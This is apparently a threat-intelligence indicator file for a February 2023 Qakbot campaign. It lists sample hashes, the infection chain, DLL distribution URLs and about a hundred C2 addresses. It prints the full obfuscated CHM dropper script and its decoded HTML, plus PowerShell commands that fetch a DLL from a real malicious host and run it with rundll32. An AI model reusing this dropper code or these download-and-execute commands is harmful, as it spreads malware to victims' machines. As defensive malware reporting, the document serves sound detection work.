-
Notifications
You must be signed in to change notification settings - Fork 30
/
Copy pathQakbot_BB16_20.02.2023.txt
209 lines (181 loc) · 7.57 KB
/
Qakbot_BB16_20.02.2023.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
20.02.2023 | Qakbot | BB16 | Campaign 1676886180 | Version 404.9
*************************************************
.one 6778c59a29e25d722230163bea272ece58d2d3696fbce4347c20104e8fb735dc - item.one
.chm 0dbc95d60b957669b5ae6e6977bae478738209fdb51dff780121320d6248b8e7
.dll b91340d156582060095227e8d26f29f5ffc8b0e8fbf35a392b649adc60a5d4ab
*************************************************
Exec >
ONENOTE.EXE C:\Users\Admin\AppData\Local\Temp\item.one
hh.exe C:\Users\Admin\AppData\Local\Temp\O P E N.chm
cmd.exe /c start /min powershell IWR -uri http://165.22.160.25/w9edb/160223 -o %temp%\adeP1F.dll;start-process rundll32 %temp%\adeP1F.dll,N115
powershell IWR -uri http://165.22.160.25/w9edb/160223 -o C:\Users\Admin\AppData\Local\Temp\adeP1F.dll;start-process rundll32 C:\Users\Admin\AppData\Local\Temp\adeP1F.dll,N115
rundll32.exe" C:\Users\Admin\AppData\Local\Temp\adeP1F.dll N115
*************************************************
.dll distro urls
http://165.22.160.25/w9edb/160223/adeP1F.dll
https://osjovanmikic.edu.rs/DwJDgf7/130223/aJ1vC.dll
http://147.182.206.33/FtFb/160223/aaSQMCd.dll
*************************************************
CHM File >> index.html
<script>
function a0b85FJ9T(a5sj1nx)
{
var aJQDXq = a5sj1nx.toString();
var acApqOPr = '';
for(var anhBObj9 = 0; anhBObj9 < aJQDXq.length; anhBObj9 += 2)
{
acApqOPr += String.fromCharCode(parseInt(aJQDXq.substr(anhBObj9, 2), 16));
}
return(acApqOPr);
}
document.write(a0b85FJ9T('0d0a093c21444f43545950452048544d4c3e0d0a093c212d2d5b6966206c742049452037205d3e3c68746d6c206c616e673d22656e2220636c6173733d2269652069653622206469723d226c74722220786d6c6e733a4d5348656c703d2275726e3a736368656d61732d6d6963726f736f66742d636f6d3a6d7368656c70223e3c215b656e6469665d2d2d3e200d0a093c212d2d5b69662049452037205d3e3c68746d6c206c616e673d22656e2220636c6173733d2269652069653722206469723d226c74722220786d6c6e733a4d5348656c703d2275726e3a736368656d61732d6d6963726f736f66742d636f6d3a6d7368656c70223e3c215b656e6469665d2d2d3e200d0a093c212d2d5b69662049452038205d3e3c68746d6c206c616e673d22656e2220636c6173733d2269652069653822206469723d226c74722220786d6c6e733a4d5348656c703d2275726e3a736368656d61732d6d6963726f736f66742d636f6d3a6d7368656c70223e3c215b656e6469665d2d2d3e200d0a093c212d2d5b69662049452039205d3e3c68746d6c206c616e673d22656e2220636c6173733d2269652069653922206469723d226c74722220786d6c6e733a4d5348656c703d2275726e3a736368656d61732d6d6963726f736f66742d636f6d3a6d7368656c70223e3c215b656e6469665d2d2d3e200d0a093c212d2d5b6966202149455d3e0d0a093c212d2d3e0d0a093c68746d6c206c616e673d22656e22206469723d226c74722220786d6c6e733a4d5348656c703d2275726e3a736368656d61732d6d6963726f736f66742d636f6d3a6d7368656c70223e0d0a093c212d2d3c215b656e6469665d2d2d3e0d0a093c686561643e0d0a093c6d65746120687474702d65717569763d22436f6e74656e742d547970652220636f6e74656e743d22746578742f68746d6c3b20636861727365743d5554462d38223e0d0a093c2f686561643e0d0a093c626f64793e0d0a09093c68313e416e20696e7465726e616c206572726f7220686173206f636375727265643c2f68313e0d0a09093c6f626a6563742069643d73686f727463757420636c61737369643d22636c7369643a35326132616161652d303835642d343138372d393765612d386333306462393930343336222077696474683d313030206865696768743d3130303e0d0a09093c706172616d206e616d653d22436f6d6d616e64222076616c75653d2273686f7274637574223e0d0a09093c706172616d206e616d653d224974656d31222076616c75653d222c636d642c2f63207374617274202f6d696e20706f7765727368656c6c20495752202d75726920687474703a2f2f3136352e32322e3136302e32352f77396564622f313630323233202d6f202574656d70255c6164655031462e646c6c3b73746172742d70726f636573732072756e646c6c3332202574656d70255c6164655031462e646c6c2c4e313135223e0d0a09093c2f6f626a6563743e0d0a09093c736372697074206c616e67756167653d227662736372697074223e0d0a0909737472203d2022436c69220d0a09093c2f7363726970743e0d0a09093c7363726970743e0d0a09090973686f72746375745b737472202b2022636b225d28293b0d0a09093c2f7363726970743e0d0a093c2f626f64793e0d0a093c2f68746d6c3e0d0a09'));
</script>
>> From Charcode - base16
<!DOCTYPE HTML>
<!--[if lt IE 7 ]><html lang="en" class="ie ie6" dir="ltr" xmlns:MSHelp="urn:schemas-microsoft-com:mshelp"><![endif]-->
<!--[if IE 7 ]><html lang="en" class="ie ie7" dir="ltr" xmlns:MSHelp="urn:schemas-microsoft-com:mshelp"><![endif]-->
<!--[if IE 8 ]><html lang="en" class="ie ie8" dir="ltr" xmlns:MSHelp="urn:schemas-microsoft-com:mshelp"><![endif]-->
<!--[if IE 9 ]><html lang="en" class="ie ie9" dir="ltr" xmlns:MSHelp="urn:schemas-microsoft-com:mshelp"><![endif]-->
<!--[if !IE]>
<!-->
<html lang="en" dir="ltr" xmlns:MSHelp="urn:schemas-microsoft-com:mshelp">
<!--<![endif]-->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
</head>
<body>
<h1>An internal error has occurred</h1>
<object id=shortcut classid="clsid:52a2aaae-085d-4187-97ea-8c30db990436" width=100 height=100>
<param name="Command" value="shortcut">
<param name="Item1" value=",cmd,/c start /min powershell IWR -uri http://165.22.160.25/w9edb/160223 -o %temp%\adeP1F.dll;start-process rundll32 %temp%\adeP1F.dll,N115">
</object>
<script language="vbscript">
str = "Cli"
</script>
<script>
shortcut[str + "ck"]();
</script>
</body>
</html>
*************************************************
c2's
201.244.108.183:995
202.186.177.88:443
47.21.51.138:995
27.0.48.233:443
103.212.19.254:995
71.31.101.183:443
190.11.198.74:443
86.225.214.138:2222
24.9.220.167:443
95.255.60.223:995
73.36.196.11:443
174.104.184.149:443
136.232.184.134:995
74.92.243.113:50000
184.176.35.223:2222
64.237.185.60:443
151.65.224.211:443
31.53.29.145:2222
85.241.180.94:443
47.21.51.138:443
72.80.7.6:50003
82.127.204.82:2222
86.188.32.131:443
27.99.45.237:2222
202.142.98.62:443
98.145.23.67:443
72.80.7.6:995
122.184.143.82:443
180.151.108.14:443
50.68.186.195:443
176.142.207.63:443
87.223.82.41:443
92.27.86.48:2222
136.244.25.165:443
77.124.6.149:443
150.107.231.59:2222
103.111.70.115:995
109.11.175.42:2222
183.87.163.165:443
79.67.165.149:995
87.221.197.113:2222
93.24.192.142:20
83.7.53.157:443
76.20.42.45:443
75.158.15.211:443
12.172.173.82:2087
50.68.204.71:993
59.28.84.65:443
58.247.115.126:995
81.229.117.95:2222
69.133.162.35:443
89.32.159.192:995
75.156.125.215:995
70.64.77.115:443
181.164.217.211:443
92.17.122.33:2222
93.156.99.48:443
86.176.144.213:2222
217.128.91.196:2222
198.2.51.242:993
50.68.204.71:995
45.50.233.214:443
205.164.227.222:443
81.157.227.223:2222
86.207.227.152:2222
147.219.4.194:443
213.67.255.57:2222
49.245.82.178:2222
91.165.188.74:50000
76.80.180.154:995
89.79.229.50:443
78.130.215.67:443
12.172.173.82:32101
139.5.239.14:443
114.92.98.210:995
116.72.250.18:443
92.97.197.177:2222
202.142.98.62:995
91.170.115.68:32100
119.155.227.81:995
87.243.146.59:443
86.96.72.139:2222
5.193.84.234:2222
46.27.231.50:2078
72.203.216.98:2222
76.170.252.153:995
75.143.236.149:443
72.200.109.104:443
103.111.70.115:443
217.165.1.53:2222
2.50.47.74:443
108.190.203.42:995
116.74.164.67:443
50.68.204.71:443
125.99.69.178:443
197.0.251.32:443
87.57.13.215:443
12.172.173.82:995
162.248.14.107:443
75.98.154.19:443
92.154.45.81:2222
86.130.9.146:2222
89.129.109.27:2222
27.109.19.90:2078
81.157.202.71:995
24.206.27.39:443
181.118.206.65:995
72.188.103.221:443
31.166.48.125:995
217.128.200.114:2222
12.172.173.82:465
84.219.213.130:6881
12.172.173.82:990
12.172.173.82:21
47.34.30.133:443
84.35.26.14:995
172.248.42.122:443
24.239.69.244:443
173.18.126.3:443
202.187.232.161:995